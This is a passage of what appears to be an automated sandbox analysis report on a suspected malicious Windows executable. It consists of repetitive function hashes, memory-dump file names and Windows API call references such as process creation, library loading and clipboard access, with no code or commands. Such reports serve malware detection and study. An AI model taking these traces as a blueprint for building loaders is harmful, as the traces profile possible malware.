                                                                                                                        • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                                                                                                        • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                                                                                        • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                                                                                        • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                                                                                                        • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                                                                                        • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                                                                                        • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                                                                                                        • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                                                                                        • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                                                                                        • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                                                                                                        • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                                                                                        • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                                                                                        • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                                                                                                        • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                                                                                        • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                          • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                          • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                          • Part of subcall function 004053F8: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                                                                                                          • Part of subcall function 004053F8: CloseHandle.KERNEL32(?), ref: 0040542A
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E72
                                                                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E82
                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA7

                                                                                                                        APIs
                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                        • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                          • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                                                                                                          • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                                                                                                          • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2547128583-0
                                                                                                                        • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                        • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                                                                                                        • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                        • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\BMhDm7YW62.exe,80000000,00000003), ref: 00405873
                                                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415043291-0
                                                                                                                        • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                        • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                                                                                        • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                        • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00403337,00000020), ref: 0040351C
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\nsfB756.tmp\, xrefs: 00403530
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsfB756.tmp\
                                                                                                                        • API String ID: 2962429428-1933228269
                                                                                                                        • Opcode ID: 69a1ec42bfd2c808f6210beb952dd846253a51cc7dcbdee1183c199696e0200a
                                                                                                                        • Instruction ID: d56dd6d0e9358e7abe0e1c75cf4fb1a02b43fa7986872cd818a2a6dcef25a25f
                                                                                                                        • Opcode Fuzzy Hash: 69a1ec42bfd2c808f6210beb952dd846253a51cc7dcbdee1183c199696e0200a
                                                                                                                        • Instruction Fuzzy Hash: 07C0123090860466D2207F78AE0B7053B58A741336B900725F174B00F2D73C6A41556E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                                                                                                                        • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405866
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                        • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                                                                                                        • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                        • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                                                                                                        • GetLastError.KERNEL32 ref: 004053D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1375471231-0
                                                                                                                        • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                                        • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                                                                                                        • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                                        • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDA,000000FF,00000004,00000000,00000000,00000000), ref: 00403098
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                        • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                                                                                                        • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                        • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,0000BFE4), ref: 004030C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405021
                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                                                                                                        • GetClientRect.USER32(?,?), ref: 0040506D
                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 00405075
                                                                                                                        • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405096
                                                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A7
                                                                                                                        • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BA
                                                                                                                        • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050C8
                                                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050DB
                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405111
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405142
                                                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040515B
                                                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405167
                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                                                                                                          • Part of subcall function 00403E89: SendMessageA.USER32(00000028,?,00000001,00403CBA), ref: 00403E97
                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405199
                                                                                                                        • ShowWindow.USER32(00000000), ref: 004051BD
                                                                                                                        • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                                                                                                        • ShowWindow.USER32(00000008), ref: 00405209
                                                                                                                        • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040523B
                                                                                                                        • CreatePopupMenu.USER32 ref: 0040524C
                                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00405274
                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D3
                                                                                                                        • OpenClipboard.USER32(00000000), ref: 004052E3
                                                                                                                        • EmptyClipboard.USER32 ref: 004052E9
                                                                                                                        • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                                                                                                        • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052FC
                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405310
                                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 00405333
                                                                                                                        • CloseClipboard.USER32 ref: 00405339
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                        • String ID: {
                                                                                                                        • API String ID: 590372296-366298937
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 004047EA
                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 004047F7
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404843
                                                                                                                        • LoadBitmapA.USER32(0000006E), ref: 00404856
                                                                                                                        • SetWindowLongA.USER32(?,000000FC,00404DD4), ref: 00404870
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404884
                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404898
                                                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 004048AD
                                                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048B9
                                                                                                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048CB
                                                                                                                        • DeleteObject.GDI32(?), ref: 004048D0
                                                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004048FB
                                                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404907
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040499C
                                                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049C7
                                                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049DB
                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404A0A
                                                                                                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A18
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404A29
                                                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B2C
